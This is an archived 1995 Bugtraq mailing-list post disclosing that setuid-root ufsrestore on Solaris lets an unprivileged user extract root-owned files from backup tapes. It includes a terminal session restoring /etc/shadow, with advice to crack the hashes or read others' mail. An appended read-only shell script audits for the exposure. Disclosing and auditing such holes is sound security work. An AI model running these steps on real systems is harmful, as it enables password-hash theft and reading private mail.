Bugtraq mailing list archives

Re: ufsrestore suid root not a security hole


From: esilva () NETCOM COM (Eduardo E. Silva)
Date: Tue, 12 Dec 1995 00:39:30 -0800


Sean Vickery wrote:

On 14 November 1995, Brett Lymn wrote:
According to Jake Luck:

yeah, but what about /usr/sbin/ufsrestore ?

it is statically linked, utilizes syslog, and suid root.


If you are a BOFH then just kill the setuid bit on ufsrestore.  It
means that root has to do the restores but it does close an awful lot
of holes (like someone dragging in a QIC and restoring their favourite
version of /etc/passwd.... need I say more?).  Or you could just
remove the global rx though this may bugger up remote root users.

Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box.  But it is more
careful than to allow an unprivileged user to create or overwrite files just
anywhere.

        BUT, it will let you read ANY file from the tape. Including
        root owned files such as /etc/shadow.

        * Know when UNIX admins run backups.
        * Extract files with ufsrestore (/etc/shadow)
        * Run Crack.
        * Or you could be reading root's mail, CEO email, etc.

$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
   sense key(0x0)= No Additional Sense   residual= 0   retries= 0
   file no= 0   block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
 .rhosts       .sh_history   devices/      etc/

ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x   2 esilva   other        512 Dec 11 19:54 .
drwxr-xr-x   3 esilva   other        512 Oct 11 21:48 ..
-r--------   1 esilva   other       1144 Oct  9 09:21 shadow.1.la

Now run crack...

--

Thanks!

-Ed                                   _
                                    /\o/\
                                   / <_> \
                                  /^^/ \^^\
                                    /___\
    +---------------------------------------------------------------------+
    |                    Can you see them all around us?                  |
    +---------------------------------------------------------------------+
    |                         esilva () netcom com                           |
    +---------------------------------------------------------------------+
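
Added example, not part of the original post and not Sun's code: a read-only shell audit of the two mitigations mentioned in the thread (clearing the setuid bit on ufsrestore, removing world execute). As an assumption not stated in the post, it also reports tape device nodes that are readable by "other". Function names are hypothetical and all paths are supplied as arguments.

```shell
#!/bin/sh
# Added example: report the exposure discussed in this thread.
# Nothing is modified; paths are passed in by the caller.

# other_perms FILE -> prints the three "other" permission characters (e.g. r-x).
# -L follows symlinks, since tape nodes such as /dev/rmt/0 are usually links.
other_perms() {
    ls -ldL -- "$1" 2>/dev/null | cut -c8-10
}

# restore_exposure BIN -> prints one of:
#   missing, setuid-world-exec, setuid-restricted, not-setuid
restore_exposure() {
    bin=$1
    [ -e "$bin" ] || { echo missing; return 0; }
    if [ -u "$bin" ]; then
        case $(other_perms "$bin") in
            *[xt]) echo setuid-world-exec ;;   # any user can run it with the owner's uid
            *)     echo setuid-restricted ;;   # "global rx" already removed
        esac
    else
        echo not-setuid                        # setuid bit already cleared
    fi
}

# tape_exposure DEV -> prints world-readable, restricted or missing
tape_exposure() {
    [ -e "$1" ] || { echo missing; return 0; }
    case $(other_perms "$1") in
        r*) echo world-readable ;;
        *)  echo restricted ;;
    esac
}

# audit BIN [DEV...] -> one report line per path; returns 1 if any path
# is in the exposed state (setuid-world-exec or world-readable).
audit() {
    rc=0
    state=$(restore_exposure "$1"); echo "$1: $state"
    [ "$state" = setuid-world-exec ] && rc=1
    shift
    for dev in "$@"; do
        state=$(tape_exposure "$dev"); echo "$dev: $state"
        [ "$state" = world-readable ] && rc=1
    done
    return $rc
}

# Run only when paths are given, e.g.: sh audit.sh /usr/sbin/ufsrestore /dev/rmt/0
[ "$#" -eq 0 ] || audit "$@"
```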


